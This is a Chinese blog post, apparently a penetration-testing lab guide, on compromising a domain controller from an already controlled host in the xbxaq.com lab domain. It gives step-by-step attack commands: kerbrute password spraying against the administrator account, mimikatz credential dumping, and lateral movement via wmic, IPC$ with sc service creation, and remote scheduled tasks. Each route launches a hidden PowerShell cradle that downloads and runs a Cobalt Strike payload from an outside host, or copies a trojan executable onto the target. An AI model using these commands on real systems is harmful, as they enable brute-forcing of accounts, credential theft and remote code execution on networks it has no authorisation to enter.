点我

通过喷洒控制域内主机

工作组用户查找administrator或者普通管理员,域内用户查找administrator或者普通域内管理员。

工作组喷洒域内主机上线

已经控制一台工作组机器,需要上线域控

前提条件
  • 明确域控IP地址
  • 明确域名
  • 域内用户(需要枚举)
操作

前提条件:

  • 已控制一台工作组机器 192.168.110.7
  • 域控的IP地址为 192.168.110.5
  • 域名为xbxaq.com

域控的账户名一般为administrator

1、进行密码喷洒(单用户多密码),将工具上传到192.168.110.7机器中

shell kerbrute.exe  bruteuser --dc 192.168.110.5 -d xbxaq.com pw.txt administrator

得到域控账户的密码,知道了明文密码直接进行横向

2、使用wmic进行横向

shell wmic /node:192.168.110.5 /user:administrator /password:a1b2c3.. process call create "powershell.exe -nop -w hidden -c \"IEX((new-object net.webclient).downloadstring('http://192.168.110.1:8000/payload.ps1'))\""

3、上线成功

域内主机喷洒域控上线

已经控制一台域内主机,需要上线域控

前提条件
  • 明确域控IP地址
  • 明确域名
  • 域内用户(不需要进行枚举)
操作

前提条件:

  • 已控制一台工作组机器 192.168.110.7(高权限用户)
  • 域控的IP地址为 192.168.110.5
  • 域名为xbxaq.com

1、使用net user /domain查询域内有哪些用户

2、进行密码喷洒(单用户多密码),将工具上传到192.168.110.7机器中

shell kerbrute.exe  bruteuser --dc 192.168.110.5 -d xbxaq.com pw.txt administrator

得到域控账户的密码,知道了明文密码直接进行横向

3、使用IPC$配合服务上线

IPC$

net use \\192.168.110.5\IPC$ "a1b2c3.." /user:"administrator"

使用CS生成的PS脚本

sc \\192.168.110.5 create test binpath= "cmd.exe /c powershell.exe -nop -w hidden -c \"IEX((new-object net.webclient).downloadstring('http://192.168.110.1:8000/payload.ps1'))\""


sc \\192.168.110.5 start test

上线成功

工作组之间进行上线

工作组只能使用IPC、明文密码或者PTH认证

已经控制一台工作组机器,需要上线另外一台工作组机器

前提条件
  • 明确工作组机器的IP地址
操作

目前条件为已控制192.168.110.7机器,且机器用户为administrator,目标IP地址为192.168.110.8

1、既然在同一个域内,首先抓取192.168.110.7机器用户的账号密码,使用mimikatz工具

获取到明文密码a1b2c3..,然后使用wmic进行CS上线

2、也可以使用IPC$配合计划任务进行上线

当两台机器的用户名和密码是相同时,可以直接使用dir

copy木马到对方的机器中

创建计划任务并启动任务

schtasks /create /s 192.168.110.8 /tn cs /tr c:/muma.exe /sc onstart /RU System
/F    #创建计划任务


schtasks /run /s 192.168.110.8  /u administrator /p a1b2c3.. /i /tn "cs"    #启动任务

上线成功

分类: 内网渗透

评论

-- 评论已关闭 --

目录